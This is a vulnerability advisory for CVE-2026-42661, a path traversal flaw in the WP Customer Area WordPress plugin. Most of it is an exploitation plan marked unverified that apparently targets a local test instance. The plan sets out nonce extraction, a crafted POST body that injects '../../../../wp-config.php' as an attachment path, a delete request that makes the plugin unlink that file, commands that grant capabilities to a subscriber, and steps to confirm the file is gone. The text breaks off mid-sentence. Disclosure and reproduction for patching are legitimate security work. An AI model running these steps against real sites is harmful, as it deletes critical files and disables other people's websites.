CVE-2026-42661

WP Customer Area <= 8.3.4 - Authenticated (Custom+) Path Traversal

Weakness: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSS Score: 5.3
Severity: medium
Patched in: 8.3.5
Time to patch: 4d

Description

The WP Customer Area plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 8.3.4. This makes it possible for authenticated attackers, with Custom-level access and above, to perform actions on files outside of the originally intended directory.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <=8.3.4
Published: May 1, 2026
Last updated: May 4, 2026
Affected plugin: customer-area

What Changed in the Fix

Changes introduced in v8.3.5


Source Code

WordPress.org SVN
Research Plan (Unverified)


Exploitation Research Plan - CVE-2026-42661

1. Vulnerability Summary

The WP Customer Area plugin (<= 8.3.4) contains an authenticated path traversal vulnerability. The flaw lies in the handling of private file attachments. When a user with sufficient privileges (Custom-level or above) creates or edits a "Private File" (cuar_private_file), they can specify attachment metadata.

Specifically, the plugin fails to sanitize the file path parameter when using certain attachment methods (like ftp-folder or server). When these attachments are later deleted—either individually or when the parent post is deleted—the plugin performs an unlink() operation on the path stored in metadata. By injecting traversal sequences (e.g., ../../../../wp-config.php), an attacker can cause the plugin to delete arbitrary files on the server.

2. Attack Vector Analysis

  • Endpoint: Frontend Private Content Editor (handled by CUAR_AbstractEditContentPageAddOn).
  • Target Action: create or update of a cuar_private_file, followed by a delete action.
  • Vulnerable Parameter: cuar_attachments[index][file]
  • Required Authentication: A user account with capabilities to manage private files (e.g., cuar_publish_private_files and cuar_delete_private_files). These are often assigned to the "Custom" role or can be granted to standard roles like Subscriber.
  • Precondition: The "Private Files" and "Post Owner" add-ons (built-in) must be active.

3. Code Flow

  1. Entry: User submits a form to ?customer-area-page=customer-private-files&cuar_action=create.
  2. Processing: CUAR_AbstractEditContentPageAddOn::handle_form_submission() is triggered.
  3. Nonce Validation: It verifies cuar_customer-private-files_nonce against the action cuar_customer-private-files.
  4. Attachment Handling: do_edit_content() calls filters to process attachments. CUAR_PrivateFilesDefaultHandlers::attach_ftp_file (or attach_server_file) is called via the cuar/private-content/files/on-attach-file?method=ftp-folder hook.
  5. Storage: The traversal string ../../../../wp-config.php is saved into the post's metadata (_cuar_attachments).
  6. Triggering the Sink: The user submits a request to delete the post: ?customer-area-page=customer-private-files&cuar_action=delete&post_id=ID&nonce=NONCE.
  7. Cleanup: CUAR_PrivateFilesDefaultHandlers::remove_orphan_local_files (or remove_attached_local_file) is triggered during post deletion.
  8. Sink:
    • It calls $po_addon->get_private_file_path($filename, $post_id, false).
    • $filename is retrieved from meta as ../../../../wp-config.php.
    • The resulting path points to the WordPress root.
    • unlink($filepath) is executed.

4. Nonce Acquisition Strategy

The nonce is required for both creation and deletion of content.

  1. Identify Page: The "Create Private File" page must be accessible.
  2. Setup: The PoC agent should ensure a page with the creation shortcode exists.
    • Command: wp post create --post_type=page --post_title="Create File" --post_content='[customer_area_create_private_file]' --post_status=publish
  3. Navigate: Use browser_navigate to go to the newly created page as the authenticated user.
  4. Extract Nonce: The nonce is stored in a hidden input field or localized JS.
    • Field name: cuar_customer-private-files_nonce
    • Extraction: browser_eval("document.getElementsByName('cuar_customer-private-files_nonce')[0].value")

5. Exploitation Strategy

Step 1: Create the Malicious Private File

Send a POST request to create a private file with a traversed attachment path.

  • URL: http://localhost:8080/index.php?customer-area-page=customer-private-files&cuar_action=create
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    cuar_form_id=customer-private-files&
    cuar_customer-private-files_nonce=[EXTRACTED_NONCE]&
    cuar_do_register=1&
    cuar_title=Exploit&
    cuar_content=Exploit&
    cuar_attachments[0][file]=../../../../wp-config.php&
    cuar_attachments[0][method]=ftp-folder&
    cuar_attachments[0][source]=local
    

Step 2: Retrieve the Post ID

Identify the ID of the newly created cuar_private_file. This can be done by parsing the redirect URL or using WP-CLI.

Step 3: Trigger File Deletion

Send a request to delete the created post. The plugin will attempt to "clean up" the attachments.

  • URL: http://localhost:8080/index.php?customer-area-page=customer-private-files&cuar_action=delete&post_id=[ID]&nonce=[EXTRACTED_NONCE]
  • Method: GET (or POST with cuar_do_register=1 depending on the UI implementation)

6. Test Data Setup

  1. Target User: Create a user with the subscriber role.
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password
  2. Grant Capabilities: The plugin uses custom capabilities. Grant them to the subscriber.
    • wp cap add subscriber cuar_publish_private_files
    • wp cap add subscriber cuar_delete_private_files
    • wp cap add subscriber cuar_edit_private_files
  3. Create Dashboard: Ensure the Customer Area dashboard is initialized.
    • wp eval "current_user_can('manage_options'); (new CUAR_CustomerPagesAddOn())->create_all_missing_pages();"
  4. Target File: Ensure wp-config.php exists (standard in WP).

7. Expected Results

  • After Step 1, a new post of type cuar_private_file is created. Its _cuar_attachments meta contains the path ../../../../wp-config.php.
  • After Step 3, the unlink() function is called on the construction: [STORAGE_DIR]/[POST_ID]/../../../../wp-config.php.
  • Since wp-content/uploads/customer-area/storage/[ID]/../../../../ resolves to the WordPress root, wp-config.php is deleted.

8. Verification Steps

  1. Check for Deletion:
    • Command: wp file exists wp-config.php
    • Expected Output: Error or confirmation that the file is missing.
  2. Check Database:
    • Command: wp post list --post_type=cuar_private_file
    • The exploit post should no longer exist.

9. Alternative Approaches

If the ftp-folder method is restricted by server configurations:

  • Try method=server: If the "Server Side Folders" logic is active, use cuar_attachments[0][method]=server and cuar_attachments[0][source]=server.
  • Direct Meta Update (if another vuln exists): If there is a separate vulnerability allowing arbitrary metadata updates, setting _cuar_attachments directly and then using the frontend "Remove Attachment" button (AJAX) would also trigger the unlink.
  • Blind Deletion: If the plugin does not provide feedback, use `
